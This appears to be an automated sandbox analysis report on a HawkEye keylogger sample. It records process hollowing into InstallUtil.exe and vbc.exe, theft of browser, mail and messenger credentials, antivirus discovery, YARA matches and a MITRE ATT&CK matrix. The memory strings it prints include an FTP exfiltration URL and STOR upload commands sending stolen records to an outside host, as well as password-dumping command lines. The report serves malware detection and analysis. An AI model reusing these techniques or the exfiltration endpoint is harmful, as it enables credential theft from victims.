Source: 5.2.InstallUtil.exe.400000.0.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\name.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
Source: C:\Users\user\AppData\Roaming\name.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'

Source: InstallUtil.exe, 00000005.00000002.2378304027.0000000000B60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000005.00000002.2378304027.0000000000B60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000005.00000002.2378304027.0000000000B60000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\name.exe	Queries volume information: C:\Users\user\AppData\Roaming\name.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\name.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00406278 GetVersionExA,

Source: C:\Users\user\AppData\Roaming\name.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.235347c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 752, type: MEMORYSTR

Yara detected MailPassView

Show sources

Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3bf5fa2.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.33394d0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.33394d0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2171177325.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2004, type: MEMORYSTR

Searches for Windows Mail specific files

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert7.db

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 4.2.name.exe.3d33caf.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3c7df.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.33516f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3ba013d.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.33516f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.33394d0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2174054080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 752, type: MEMORYSTR

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
Source: InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
Source: InstallUtil.exe, 00000005.00000002.2378575943.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2378575943.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: l\ftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2378575943.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: ftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_284992%208.10.2021%203:56:04%20PM.txt
Source: InstallUtil.exe, 00000005.00000002.2378575943.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: lbftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_284992%208.10.2021%203:56:04%20PM.txt
Source: InstallUtil.exe, 00000005.00000002.2378587090.0000000002490000.00000004.00000001.sdmp	String found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt0w%l
Source: InstallUtil.exe, 00000005.00000002.2378587090.0000000002490000.00000004.00000001.sdmp	String found in binary or memory: lHSTOR HawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2378587090.0000000002490000.00000004.00000001.sdmp	String found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt
Source: InstallUtil.exe, 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: InstallUtil.exe, 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: InstallUtil.exe, 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: InstallUtil.exe, 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: InstallUtil.exe, 00000005.00000002.2378049146.00000000005D4000.00000004.00000020.sdmp	String found in binary or memory: pm^//ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.235347c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 752, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation1	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Alternative Protocol1	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media1	Native API11	Valid Accounts1	Valid Accounts1	Deobfuscate/Decode Files or Information11	Input Capture1	Peripheral Device Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Access Token Manipulation1	Obfuscated Files or Information31	Credentials in Registry2	Account Discovery1	SMB/Windows Admin Shares	Email Collection2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution13	Logon Script (Mac)	Process Injection412	Software Packing11	Credentials In Files1	File and Directory Discovery3	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	System Information Discovery18	SSH	Clipboard Data1	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol33	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Security Software Discovery121	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion21	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection412	/etc/passwd and /etc/shadow	Process Discovery4	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories2	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
